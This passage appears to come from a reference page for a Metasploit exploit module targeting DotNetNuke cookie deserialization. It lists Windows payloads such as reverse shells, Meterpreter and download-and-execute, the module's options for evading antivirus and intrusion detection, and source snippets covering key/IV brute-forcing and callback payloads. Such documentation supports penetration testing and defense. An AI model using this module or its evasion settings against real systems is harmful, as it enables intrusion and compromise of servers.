   5    payload/windows/dllinject/bind_hidden_ipknock_tcp                            normal  No     Reflective DLL Injection, Hidden Bind Ipknock TCP Stager
   6    payload/windows/dllinject/bind_hidden_tcp                                    normal  No     Reflective DLL Injection, Hidden Bind TCP Stager
   7    payload/windows/dllinject/bind_ipv6_tcp                                      normal  No     Reflective DLL Injection, Bind IPv6 TCP Stager (Windows x86)
   8    payload/windows/dllinject/bind_ipv6_tcp_uuid                                 normal  No     Reflective DLL Injection, Bind IPv6 TCP Stager with UUID Support (Windows x86)
   9    payload/windows/dllinject/bind_named_pipe                                    normal  No     Reflective DLL Injection, Windows x86 Bind Named Pipe Stager
   10   payload/windows/dllinject/bind_nonx_tcp                                      normal  No     Reflective DLL Injection, Bind TCP Stager (No NX or Win7)
   11   payload/windows/dllinject/bind_tcp                                           normal  No     Reflective DLL Injection, Bind TCP Stager (Windows x86)
   12   payload/windows/dllinject/bind_tcp_rc4                                       normal  No     Reflective DLL Injection, Bind TCP Stager (RC4 Stage Encryption, Metasm)
   13   payload/windows/dllinject/bind_tcp_uuid                                      normal  No     Reflective DLL Injection, Bind TCP Stager with UUID Support (Windows x86)
   14   payload/windows/dllinject/reverse_hop_http                                   normal  No     Reflective DLL Injection, Reverse Hop HTTP/HTTPS Stager
   15   payload/windows/dllinject/reverse_http                                       normal  No     Reflective DLL Injection, Windows Reverse HTTP Stager (wininet)
   16   payload/windows/dllinject/reverse_http_proxy_pstore                          normal  No     Reflective DLL Injection, Reverse HTTP Stager Proxy
   17   payload/windows/dllinject/reverse_ipv6_tcp                                   normal  No     Reflective DLL Injection, Reverse TCP Stager (IPv6)
   18   payload/windows/dllinject/reverse_nonx_tcp                                   normal  No     Reflective DLL Injection, Reverse TCP Stager (No NX or Win7)
   19   payload/windows/dllinject/reverse_ord_tcp                                    normal  No     Reflective DLL Injection, Reverse Ordinal TCP Stager (No NX or Win7)
   20   payload/windows/dllinject/reverse_tcp                                        normal  No     Reflective DLL Injection, Reverse TCP Stager
   21   payload/windows/dllinject/reverse_tcp_allports                               normal  No     Reflective DLL Injection, Reverse All-Port TCP Stager
   22   payload/windows/dllinject/reverse_tcp_dns                                    normal  No     Reflective DLL Injection, Reverse TCP Stager (DNS)
   23   payload/windows/dllinject/reverse_tcp_rc4                                    normal  No     Reflective DLL Injection, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   24   payload/windows/dllinject/reverse_tcp_rc4_dns                                normal  No     Reflective DLL Injection, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
   25   payload/windows/dllinject/reverse_tcp_uuid                                   normal  No     Reflective DLL Injection, Reverse TCP Stager with UUID Support
   26   payload/windows/dllinject/reverse_winhttp                                    normal  No     Reflective DLL Injection, Windows Reverse HTTP Stager (winhttp)
   27   payload/windows/dns_txt_query_exec                                           normal  No     DNS TXT Record Payload Download and Execution
   28   payload/windows/download_exec                                                normal  No     Windows Executable Download (http,https,ftp) and Execute
   29   payload/windows/exec                                                         normal  No     Windows Execute Command
   30   payload/windows/loadlibrary                                                  normal  No     Windows LoadLibrary Path
   31   payload/windows/messagebox                                                   normal  No     Windows MessageBox
   32   payload/windows/meterpreter/bind_hidden_ipknock_tcp                          normal  No     Windows Meterpreter (Reflective Injection), Hidden Bind Ipknock TCP Stager
   33   payload/windows/meterpreter/bind_hidden_tcp                                  normal  No     Windows Meterpreter (Reflective Injection), Hidden Bind TCP Stager
   34   payload/windows/meterpreter/bind_ipv6_tcp                                    normal  No     Windows Meterpreter (Reflective Injection), Bind IPv6 TCP Stager (Windows x86)
   35   payload/windows/meterpreter/bind_ipv6_tcp_uuid                               normal  No     Windows Meterpreter (Reflective Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86)
   36   payload/windows/meterpreter/bind_named_pipe                                  normal  No     Windows Meterpreter (Reflective Injection), Windows x86 Bind Named Pipe Stager
   37   payload/windows/meterpreter/bind_nonx_tcp                                    normal  No     Windows Meterpreter (Reflective Injection), Bind TCP Stager (No NX or Win7)
   38   payload/windows/meterpreter/bind_tcp                                         normal  No     Windows Meterpreter (Reflective Injection), Bind TCP Stager (Windows x86)
   39   payload/windows/meterpreter/bind_tcp_rc4                                     normal  No     Windows Meterpreter (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm)
   40   payload/windows/meterpreter/bind_tcp_uuid                                    normal  No     Windows Meterpreter (Reflective Injection), Bind TCP Stager with UUID Support (Windows x86)
   41   payload/windows/meterpreter/reverse_hop_http                                 normal  No     Windows Meterpreter (Reflective Injection), Reverse Hop HTTP/HTTPS Stager
   42   payload/windows/meterpreter/reverse_http                                     normal  No     Windows Meterpreter (Reflective Injection), Windows Reverse HTTP Stager (wininet)
   43   payload/windows/meterpreter/reverse_http_proxy_pstore                        normal  No     Windows Meterpreter (Reflective Injection), Reverse HTTP Stager Proxy
   44   payload/windows/meterpreter/reverse_https                                    normal  No     Windows Meterpreter (Reflective Injection), Windows Reverse HTTPS Stager (wininet)
   45   payload/windows/meterpreter/reverse_https_proxy                              normal  No     Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager with Support for Custom Proxy
   46   payload/windows/meterpreter/reverse_ipv6_tcp                                 normal  No     Windows Meterpreter (Reflective Injection), Reverse TCP Stager (IPv6)
   47   payload/windows/meterpreter/reverse_named_pipe                               normal  No     Windows Meterpreter (Reflective Injection), Windows x86 Reverse Named Pipe (SMB) Stager
   48   payload/windows/meterpreter/reverse_nonx_tcp                                 normal  No     Windows Meterpreter (Reflective Injection), Reverse TCP Stager (No NX or Win7)
   49   payload/windows/meterpreter/reverse_ord_tcp                                  normal  No     Windows Meterpreter (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
   50   payload/windows/meterpreter/reverse_tcp                                      normal  No     Windows Meterpreter (Reflective Injection), Reverse TCP Stager
   51   payload/windows/meterpreter/reverse_tcp_allports                             normal  No     Windows Meterpreter (Reflective Injection), Reverse All-Port TCP Stager
   52   payload/windows/meterpreter/reverse_tcp_dns                                  normal  No     Windows Meterpreter (Reflective Injection), Reverse TCP Stager (DNS)
   53   payload/windows/meterpreter/reverse_tcp_rc4                                  normal  No     Windows Meterpreter (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   54   payload/windows/meterpreter/reverse_tcp_rc4_dns                              normal  No     Windows Meterpreter (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
   55   payload/windows/meterpreter/reverse_tcp_uuid                                 normal  No     Windows Meterpreter (Reflective Injection), Reverse TCP Stager with UUID Support
   56   payload/windows/meterpreter/reverse_winhttp                                  normal  No     Windows Meterpreter (Reflective Injection), Windows Reverse HTTP Stager (winhttp)
   57   payload/windows/meterpreter/reverse_winhttps                                 normal  No     Windows Meterpreter (Reflective Injection), Windows Reverse HTTPS Stager (winhttp)
   58   payload/windows/meterpreter_bind_named_pipe                                  normal  No     Windows Meterpreter Shell, Bind Named Pipe Inline
   59   payload/windows/meterpreter_bind_tcp                                         normal  No     Windows Meterpreter Shell, Bind TCP Inline
   60   payload/windows/meterpreter_reverse_http                                     normal  No     Windows Meterpreter Shell, Reverse HTTP Inline
   61   payload/windows/meterpreter_reverse_https                                    normal  No     Windows Meterpreter Shell, Reverse HTTPS Inline
   62   payload/windows/meterpreter_reverse_ipv6_tcp                                 normal  No     Windows Meterpreter Shell, Reverse TCP Inline (IPv6)
   63   payload/windows/meterpreter_reverse_tcp                                      normal  No     Windows Meterpreter Shell, Reverse TCP Inline
   64   payload/windows/metsvc_bind_tcp                                              normal  No     Windows Meterpreter Service, Bind TCP
   65   payload/windows/metsvc_reverse_tcp                                           normal  No     Windows Meterpreter Service, Reverse TCP Inline
   66   payload/windows/patchupdllinject/bind_hidden_ipknock_tcp                     normal  No     Windows Inject DLL, Hidden Bind Ipknock TCP Stager
   67   payload/windows/patchupdllinject/bind_hidden_tcp                             normal  No     Windows Inject DLL, Hidden Bind TCP Stager
   68   payload/windows/patchupdllinject/bind_ipv6_tcp                               normal  No     Windows Inject DLL, Bind IPv6 TCP Stager (Windows x86)
   69   payload/windows/patchupdllinject/bind_ipv6_tcp_uuid                          normal  No     Windows Inject DLL, Bind IPv6 TCP Stager with UUID Support (Windows x86)
   70   payload/windows/patchupdllinject/bind_named_pipe                             normal  No     Windows Inject DLL, Windows x86 Bind Named Pipe Stager
   71   payload/windows/patchupdllinject/bind_nonx_tcp                               normal  No     Windows Inject DLL, Bind TCP Stager (No NX or Win7)
   72   payload/windows/patchupdllinject/bind_tcp                                    normal  No     Windows Inject DLL, Bind TCP Stager (Windows x86)
   73   payload/windows/patchupdllinject/bind_tcp_rc4                                normal  No     Windows Inject DLL, Bind TCP Stager (RC4 Stage Encryption, Metasm)
   74   payload/windows/patchupdllinject/bind_tcp_uuid                               normal  No     Windows Inject DLL, Bind TCP Stager with UUID Support (Windows x86)
   75   payload/windows/patchupdllinject/reverse_ipv6_tcp                            normal  No     Windows Inject DLL, Reverse TCP Stager (IPv6)
   76   payload/windows/patchupdllinject/reverse_nonx_tcp                            normal  No     Windows Inject DLL, Reverse TCP Stager (No NX or Win7)
   77   payload/windows/patchupdllinject/reverse_ord_tcp                             normal  No     Windows Inject DLL, Reverse Ordinal TCP Stager (No NX or Win7)
   78   payload/windows/patchupdllinject/reverse_tcp                                 normal  No     Windows Inject DLL, Reverse TCP Stager
   79   payload/windows/patchupdllinject/reverse_tcp_allports                        normal  No     Windows Inject DLL, Reverse All-Port TCP Stager
   80   payload/windows/patchupdllinject/reverse_tcp_dns                             normal  No     Windows Inject DLL, Reverse TCP Stager (DNS)
   81   payload/windows/patchupdllinject/reverse_tcp_rc4                             normal  No     Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   82   payload/windows/patchupdllinject/reverse_tcp_rc4_dns                         normal  No     Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
   83   payload/windows/patchupdllinject/reverse_tcp_uuid                            normal  No     Windows Inject DLL, Reverse TCP Stager with UUID Support
   84   payload/windows/patchupmeterpreter/bind_hidden_ipknock_tcp                   normal  No     Windows Meterpreter (skape/jt Injection), Hidden Bind Ipknock TCP Stager
   85   payload/windows/patchupmeterpreter/bind_hidden_tcp                           normal  No     Windows Meterpreter (skape/jt Injection), Hidden Bind TCP Stager
   86   payload/windows/patchupmeterpreter/bind_ipv6_tcp                             normal  No     Windows Meterpreter (skape/jt Injection), Bind IPv6 TCP Stager (Windows x86)
   87   payload/windows/patchupmeterpreter/bind_ipv6_tcp_uuid                        normal  No     Windows Meterpreter (skape/jt Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86)
   88   payload/windows/patchupmeterpreter/bind_named_pipe                           normal  No     Windows Meterpreter (skape/jt Injection), Windows x86 Bind Named Pipe Stager
   89   payload/windows/patchupmeterpreter/bind_nonx_tcp                             normal  No     Windows Meterpreter (skape/jt Injection), Bind TCP Stager (No NX or Win7)
   90   payload/windows/patchupmeterpreter/bind_tcp                                  normal  No     Windows Meterpreter (skape/jt Injection), Bind TCP Stager (Windows x86)
   91   payload/windows/patchupmeterpreter/bind_tcp_rc4                              normal  No     Windows Meterpreter (skape/jt Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm)
   92   payload/windows/patchupmeterpreter/bind_tcp_uuid                             normal  No     Windows Meterpreter (skape/jt Injection), Bind TCP Stager with UUID Support (Windows x86)
   93   payload/windows/patchupmeterpreter/reverse_ipv6_tcp                          normal  No     Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (IPv6)
   94   payload/windows/patchupmeterpreter/reverse_nonx_tcp                          normal  No     Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (No NX or Win7)
   95   payload/windows/patchupmeterpreter/reverse_ord_tcp                           normal  No     Windows Meterpreter (skape/jt Injection), Reverse Ordinal TCP Stager (No NX or Win7)
   96   payload/windows/patchupmeterpreter/reverse_tcp                               normal  No     Windows Meterpreter (skape/jt Injection), Reverse TCP Stager
   97   payload/windows/patchupmeterpreter/reverse_tcp_allports                      normal  No     Windows Meterpreter (skape/jt Injection), Reverse All-Port TCP Stager
   98   payload/windows/patchupmeterpreter/reverse_tcp_dns                           normal  No     Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (DNS)
   99   payload/windows/patchupmeterpreter/reverse_tcp_rc4                           normal  No     Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   100  payload/windows/patchupmeterpreter/reverse_tcp_rc4_dns                       normal  No     Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
   101  payload/windows/patchupmeterpreter/reverse_tcp_uuid                          normal  No     Windows Meterpreter (skape/jt Injection), Reverse TCP Stager with UUID Support
   102  payload/windows/peinject/bind_hidden_ipknock_tcp                             normal  No     Windows Inject PE Files, Hidden Bind Ipknock TCP Stager
   103  payload/windows/peinject/bind_hidden_tcp                                     normal  No     Windows Inject PE Files, Hidden Bind TCP Stager
   104  payload/windows/peinject/bind_ipv6_tcp                                       normal  No     Windows Inject PE Files, Bind IPv6 TCP Stager (Windows x86)
   105  payload/windows/peinject/bind_ipv6_tcp_uuid                                  normal  No     Windows Inject PE Files, Bind IPv6 TCP Stager with UUID Support (Windows x86)
   106  payload/windows/peinject/bind_named_pipe                                     normal  No     Windows Inject PE Files, Windows x86 Bind Named Pipe Stager
   107  payload/windows/peinject/bind_nonx_tcp                                       normal  No     Windows Inject PE Files, Bind TCP Stager (No NX or Win7)
   108  payload/windows/peinject/bind_tcp                                            normal  No     Windows Inject PE Files, Bind TCP Stager (Windows x86)
   109  payload/windows/peinject/bind_tcp_rc4                                        normal  No     Windows Inject PE Files, Bind TCP Stager (RC4 Stage Encryption, Metasm)
   110  payload/windows/peinject/bind_tcp_uuid                                       normal  No     Windows Inject PE Files, Bind TCP Stager with UUID Support (Windows x86)
   111  payload/windows/peinject/reverse_ipv6_tcp                                    normal  No     Windows Inject PE Files, Reverse TCP Stager (IPv6)
   112  payload/windows/peinject/reverse_named_pipe                                  normal  No     Windows Inject PE Files, Windows x86 Reverse Named Pipe (SMB) Stager
   113  payload/windows/peinject/reverse_nonx_tcp                                    normal  No     Windows Inject PE Files, Reverse TCP Stager (No NX or Win7)
   114  payload/windows/peinject/reverse_ord_tcp                                     normal  No     Windows Inject PE Files, Reverse Ordinal TCP Stager (No NX or Win7)
   115  payload/windows/peinject/reverse_tcp                                         normal  No     Windows Inject PE Files, Reverse TCP Stager
   116  payload/windows/peinject/reverse_tcp_allports                                normal  No     Windows Inject PE Files, Reverse All-Port TCP Stager
   117  payload/windows/peinject/reverse_tcp_dns                                     normal  No     Windows Inject PE Files, Reverse TCP Stager (DNS)
   118  payload/windows/peinject/reverse_tcp_rc4                                     normal  No     Windows Inject PE Files, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   119  payload/windows/peinject/reverse_tcp_rc4_dns                                 normal  No     Windows Inject PE Files, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
   120  payload/windows/peinject/reverse_tcp_uuid                                    normal  No     Windows Inject PE Files, Reverse TCP Stager with UUID Support
   121  payload/windows/pingback_bind_tcp                                            normal  No     Windows x86 Pingback, Bind TCP Inline
   122  payload/windows/pingback_reverse_tcp                                         normal  No     Windows x86 Pingback, Reverse TCP Inline
   123  payload/windows/powershell_bind_tcp                                          normal  No     Windows Interactive Powershell Session, Bind TCP
   124  payload/windows/powershell_reverse_tcp                                       normal  No     Windows Interactive Powershell Session, Reverse TCP
   125  payload/windows/shell/bind_hidden_ipknock_tcp                                normal  No     Windows Command Shell, Hidden Bind Ipknock TCP Stager
   126  payload/windows/shell/bind_hidden_tcp                                        normal  No     Windows Command Shell, Hidden Bind TCP Stager
   127  payload/windows/shell/bind_ipv6_tcp                                          normal  No     Windows Command Shell, Bind IPv6 TCP Stager (Windows x86)
   128  payload/windows/shell/bind_ipv6_tcp_uuid                                     normal  No     Windows Command Shell, Bind IPv6 TCP Stager with UUID Support (Windows x86)
   129  payload/windows/shell/bind_named_pipe                                        normal  No     Windows Command Shell, Windows x86 Bind Named Pipe Stager
   130  payload/windows/shell/bind_nonx_tcp                                          normal  No     Windows Command Shell, Bind TCP Stager (No NX or Win7)
   131  payload/windows/shell/bind_tcp                                               normal  No     Windows Command Shell, Bind TCP Stager (Windows x86)
   132  payload/windows/shell/bind_tcp_rc4                                           normal  No     Windows Command Shell, Bind TCP Stager (RC4 Stage Encryption, Metasm)
   133  payload/windows/shell/bind_tcp_uuid                                          normal  No     Windows Command Shell, Bind TCP Stager with UUID Support (Windows x86)
   134  payload/windows/shell/reverse_ipv6_tcp                                       normal  No     Windows Command Shell, Reverse TCP Stager (IPv6)
   135  payload/windows/shell/reverse_nonx_tcp                                       normal  No     Windows Command Shell, Reverse TCP Stager (No NX or Win7)
   136  payload/windows/shell/reverse_ord_tcp                                        normal  No     Windows Command Shell, Reverse Ordinal TCP Stager (No NX or Win7)
   137  payload/windows/shell/reverse_tcp                                            normal  No     Windows Command Shell, Reverse TCP Stager
   138  payload/windows/shell/reverse_tcp_allports                                   normal  No     Windows Command Shell, Reverse All-Port TCP Stager
   139  payload/windows/shell/reverse_tcp_dns                                        normal  No     Windows Command Shell, Reverse TCP Stager (DNS)
   140  payload/windows/shell/reverse_tcp_rc4                                        normal  No     Windows Command Shell, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   141  payload/windows/shell/reverse_tcp_rc4_dns                                    normal  No     Windows Command Shell, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
   142  payload/windows/shell/reverse_tcp_uuid                                       normal  No     Windows Command Shell, Reverse TCP Stager with UUID Support
   143  payload/windows/shell/reverse_udp                                            normal  No     Windows Command Shell, Reverse UDP Stager with UUID Support
   144  payload/windows/shell_bind_tcp                                               normal  No     Windows Command Shell, Bind TCP Inline
   145  payload/windows/shell_bind_tcp_xpfw                                          normal  No     Windows Disable Windows ICF, Command Shell, Bind TCP Inline
   146  payload/windows/shell_hidden_bind_tcp                                        normal  No     Windows Command Shell, Hidden Bind TCP Inline
   147  payload/windows/shell_reverse_tcp                                            normal  No     Windows Command Shell, Reverse TCP Inline
   148  payload/windows/speak_pwned                                                  normal  No     Windows Speech API - Say "You Got Pwned!"
   149  payload/windows/upexec/bind_hidden_ipknock_tcp                               normal  No     Windows Upload/Execute, Hidden Bind Ipknock TCP Stager
   150  payload/windows/upexec/bind_hidden_tcp                                       normal  No     Windows Upload/Execute, Hidden Bind TCP Stager
   151  payload/windows/upexec/bind_ipv6_tcp                                         normal  No     Windows Upload/Execute, Bind IPv6 TCP Stager (Windows x86)
   152  payload/windows/upexec/bind_ipv6_tcp_uuid                                    normal  No     Windows Upload/Execute, Bind IPv6 TCP Stager with UUID Support (Windows x86)
   153  payload/windows/upexec/bind_named_pipe                                       normal  No     Windows Upload/Execute, Windows x86 Bind Named Pipe Stager
   154  payload/windows/upexec/bind_nonx_tcp                                         normal  No     Windows Upload/Execute, Bind TCP Stager (No NX or Win7)
   155  payload/windows/upexec/bind_tcp                                              normal  No     Windows Upload/Execute, Bind TCP Stager (Windows x86)
   156  payload/windows/upexec/bind_tcp_rc4                                          normal  No     Windows Upload/Execute, Bind TCP Stager (RC4 Stage Encryption, Metasm)
   157  payload/windows/upexec/bind_tcp_uuid                                         normal  No     Windows Upload/Execute, Bind TCP Stager with UUID Support (Windows x86)
   158  payload/windows/upexec/reverse_ipv6_tcp                                      normal  No     Windows Upload/Execute, Reverse TCP Stager (IPv6)
   159  payload/windows/upexec/reverse_nonx_tcp                                      normal  No     Windows Upload/Execute, Reverse TCP Stager (No NX or Win7)
   160  payload/windows/upexec/reverse_ord_tcp                                       normal  No     Windows Upload/Execute, Reverse Ordinal TCP Stager (No NX or Win7)
   161  payload/windows/upexec/reverse_tcp                                           normal  No     Windows Upload/Execute, Reverse TCP Stager
   162  payload/windows/upexec/reverse_tcp_allports                                  normal  No     Windows Upload/Execute, Reverse All-Port TCP Stager
   163  payload/windows/upexec/reverse_tcp_dns                                       normal  No     Windows Upload/Execute, Reverse TCP Stager (DNS)
   164  payload/windows/upexec/reverse_tcp_rc4                                       normal  No     Windows Upload/Execute, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   165  payload/windows/upexec/reverse_tcp_rc4_dns                                   normal  No     Windows Upload/Execute, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
   166  payload/windows/upexec/reverse_tcp_uuid                                      normal  No     Windows Upload/Execute, Reverse TCP Stager with UUID Support
   167  payload/windows/upexec/reverse_udp                                           normal  No     Windows Upload/Execute, Reverse UDP Stager with UUID Support
   168  payload/windows/vncinject/bind_hidden_ipknock_tcp                            normal  No     VNC Server (Reflective Injection), Hidden Bind Ipknock TCP Stager
   169  payload/windows/vncinject/bind_hidden_tcp                                    normal  No     VNC Server (Reflective Injection), Hidden Bind TCP Stager
   170  payload/windows/vncinject/bind_ipv6_tcp                                      normal  No     VNC Server (Reflective Injection), Bind IPv6 TCP Stager (Windows x86)
   171  payload/windows/vncinject/bind_ipv6_tcp_uuid                                 normal  No     VNC Server (Reflective Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86)
   172  payload/windows/vncinject/bind_named_pipe                                    normal  No     VNC Server (Reflective Injection), Windows x86 Bind Named Pipe Stager
   173  payload/windows/vncinject/bind_nonx_tcp                                      normal  No     VNC Server (Reflective Injection), Bind TCP Stager (No NX or Win7)
   174  payload/windows/vncinject/bind_tcp                                           normal  No     VNC Server (Reflective Injection), Bind TCP Stager (Windows x86)
   175  payload/windows/vncinject/bind_tcp_rc4                                       normal  No     VNC Server (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm)
   176  payload/windows/vncinject/bind_tcp_uuid                                      normal  No     VNC Server (Reflective Injection), Bind TCP Stager with UUID Support (Windows x86)
   177  payload/windows/vncinject/reverse_hop_http                                   normal  No     VNC Server (Reflective Injection), Reverse Hop HTTP/HTTPS Stager
   178  payload/windows/vncinject/reverse_http                                       normal  No     VNC Server (Reflective Injection), Windows Reverse HTTP Stager (wininet)
   179  payload/windows/vncinject/reverse_http_proxy_pstore                          normal  No     VNC Server (Reflective Injection), Reverse HTTP Stager Proxy
   180  payload/windows/vncinject/reverse_ipv6_tcp                                   normal  No     VNC Server (Reflective Injection), Reverse TCP Stager (IPv6)
   181  payload/windows/vncinject/reverse_nonx_tcp                                   normal  No     VNC Server (Reflective Injection), Reverse TCP Stager (No NX or Win7)
   182  payload/windows/vncinject/reverse_ord_tcp                                    normal  No     VNC Server (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
   183  payload/windows/vncinject/reverse_tcp                                        normal  No     VNC Server (Reflective Injection), Reverse TCP Stager
   184  payload/windows/vncinject/reverse_tcp_allports                               normal  No     VNC Server (Reflective Injection), Reverse All-Port TCP Stager
   185  payload/windows/vncinject/reverse_tcp_dns                                    normal  No     VNC Server (Reflective Injection), Reverse TCP Stager (DNS)
   186  payload/windows/vncinject/reverse_tcp_rc4                                    normal  No     VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   187  payload/windows/vncinject/reverse_tcp_rc4_dns                                normal  No     VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
   188  payload/windows/vncinject/reverse_tcp_uuid                                   normal  No     VNC Server (Reflective Injection), Reverse TCP Stager with UUID Support
   189  payload/windows/vncinject/reverse_winhttp                                    normal  No     VNC Server (Reflective Injection), Windows Reverse HTTP Stager (winhttp)

Evasion Options


Here is the full list of possible evasion options supported by the windows/http/dnn_cookie_deserialization_rce exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(windows/http/dnn_cookie_deserialization_rce) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::chunked                 false            no        Enable chunking of HTTP responses via "Transfer-Encoding: chunked"
   HTTP::compression             none             no        Enable compression of HTTP responses via content encoding (Accepted: none, gzip, deflate)
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::junk_headers            false            no        Enable insertion of random junk HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::no_cache                false            no        Disallow the browser to cache HTTP content
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
   HTTP::server_name             Apache           yes       Configures the Server header of all outgoing replies
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request
   TCP::max_send_size            0                no        Maximum tcp segment size.  (0 = disable)
   TCP::send_delay               0                no        Delays inserted before every send.  (0 = disable)

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Target requires encrypted payload. Exploit may not succeed.


Here is a relevant code snippet related to the "Target requires encrypted payload. Exploit may not succeed." error message:

218:	    @dry_run = datastore['DryRun']
219:	    key = datastore['KEY']
220:	    iv = datastore['IV']
221:	
222:	    if target['ReqEncrypt'] && @encrypted == false
223:	      print_warning('Target requires encrypted payload. Exploit may not succeed.')
224:	    end
225:	
226:	    if @encrypted
227:	      # Requires either supplied key and IV, or verification code and plaintext
228:	      if (!key.blank? && !iv.blank?)

You must provide either (VERIFICATION_CODE and VERIFICATION_PLAIN) or (KEY and IV).


Here is a relevant code snippet related to the "You must provide either (VERIFICATION_CODE and VERIFICATION_PLAIN) or (KEY and IV)." error message:

230:	        # Key and IV were supplied, don't try and decrypt.
231:	        @try_decrypt = false
232:	      elsif (!@verification_codes.empty? && [email protected]?)
233:	        @try_decrypt = true
234:	      else
235:	        fail_with(Failure::BadConfig, 'You must provide either (VERIFICATION_CODE and VERIFICATION_PLAIN) or (KEY and IV).')
236:	      end
237:	    end
238:	
239:	    if target['ReqSession'] && @session_token.blank?
240:	      fail_with(Failure::BadConfig, 'Target requires a valid SESSION_TOKEN for exploitation.')

Target requires a valid SESSION_TOKEN for exploitation.


Here is a relevant code snippet related to the "Target requires a valid SESSION_TOKEN for exploitation." error message:

235:	        fail_with(Failure::BadConfig, 'You must provide either (VERIFICATION_CODE and VERIFICATION_PLAIN) or (KEY and IV).')
236:	      end
237:	    end
238:	
239:	    if target['ReqSession'] && @session_token.blank?
240:	      fail_with(Failure::BadConfig, 'Target requires a valid SESSION_TOKEN for exploitation.')
241:	    end
242:	
243:	    if @encrypted && @try_decrypt
244:	      # Set IV for decryption as the known plaintext, manually
245:	      # apply PKCS padding (N bytes of N), and disable padding on the decryptor to increase speed.

Finding possible base IVs. This may take a few minutes...


Here is a relevant code snippet related to the "Finding possible base IVs. This may take a few minutes..." error message:

262:	
263:	        # re-enable padding here as it doesn't have the
264:	        # same performance impact when trying to find possible IV values.
265:	        @decryptor.padding = 1
266:	
267:	        print_warning('Finding possible base IVs. This may take a few minutes...')
268:	        start = Time.now
269:	        find_ivs(@verification_codes, key)
270:	        elapsed = Time.now - start
271:	        vprint_status(
272:	          format(

Trying all possible KEY and IV combinations...


Here is a relevant code snippet related to the "Trying all possible KEY and IV combinations..." error message:

288:	        # that will callback to an HTTP listener
289:	        # with the index of the passphrase that worked.
290:	
291:	        # set SRVHOST as LHOST value for HTTPServer mixin
292:	        datastore['SRVHOST'] = datastore['LHOST']
293:	        print_warning('Trying all possible KEY and IV combinations...')
294:	        print_status("Starting HTTP listener on port #{datastore['SRVPORT']}...")
295:	        start_service
296:	        vprint_warning("Sending #{@passphrases.count} test Payload(s) to: #{normalize_uri(target_uri.path)}. This may take a few minutes ...")
297:	
298:	        test_passphrases

Sending <PASSPHRASES.COUNT> test Payload(s) to: <NORMALIZE_URI-TARGET_URI.PATH>. This may take a few minutes ...


Here is a relevant code snippet related to the "Sending <PASSPHRASES.COUNT> test Payload(s) to: <NORMALIZE_URI-TARGET_URI.PATH>. This may take a few minutes ..." error message:

291:	        # set SRVHOST as LHOST value for HTTPServer mixin
292:	        datastore['SRVHOST'] = datastore['LHOST']
293:	        print_warning('Trying all possible KEY and IV combinations...')
294:	        print_status("Starting HTTP listener on port #{datastore['SRVPORT']}...")
295:	        start_service
296:	        vprint_warning("Sending #{@passphrases.count} test Payload(s) to: #{normalize_uri(target_uri.path)}. This may take a few minutes ...")
297:	
298:	        test_passphrases
299:	
